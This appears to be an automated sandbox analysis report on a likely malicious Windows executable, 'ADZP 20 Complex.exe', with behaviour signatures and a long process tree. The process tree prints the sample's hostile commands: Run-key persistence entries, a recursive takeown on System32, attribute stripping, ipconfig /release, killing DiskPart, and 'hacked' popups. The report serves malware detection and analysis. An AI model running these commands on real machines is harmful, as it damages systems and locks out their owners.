Analysis Overview
SHA256
6ca11c8b6442db97c02f3b0f73db61f58c96d52e8a880e33abee5b10807d993f
Threat Level: Likely malicious
The file ADZP 20 Complex.exe was found to be: Likely malicious.
Malicious Activity Summary
Possible privilege escalation attempt
Modifies Windows Firewall
Checks computer location settings
Executes dropped EXE
Modifies file permissions
Reads user/profile data of web browsers
Drops file in System32 directory
Drops autorun.inf file
Drops file in Windows directory
Enumerates physical storage devices
Unsigned PE
Suspicious use of SetWindowsHookEx
Modifies registry class
Views/modifies file attributes
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: CmdExeWriteProcessMemorySpam
Kills process with taskkill
Gathers network information
Suspicious use of WriteProcessMemory
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-05-25 16:32
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-25 16:32
Reported
2024-05-25 16:35
Platform
win7-20240508-en
Max time kernel
16s
Max time network
120s
Command Line
Signatures
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Reads user/profile data of web browsers
Drops autorun.inf file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | C:\Windows\system32\cmd.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\Twain_20.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\Twain_20.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\Twain_20.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\Twain_20.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\Twain_20.dll | C:\Windows\system32\cmd.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
Enumerates physical storage devices
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\317C.tmp\317D.tmp\317E.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\3997.tmp\3998.tmp\3999.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\39E5.tmp\39E6.tmp\39E7.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\3A14.tmp\3A15.tmp\3A16.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-5762069781943681416-1423496694-104786870-53312932514848603702038929073-238344637"
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-170475197511795937554881505741372221019166034240-267057350-13784797421325353237"
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
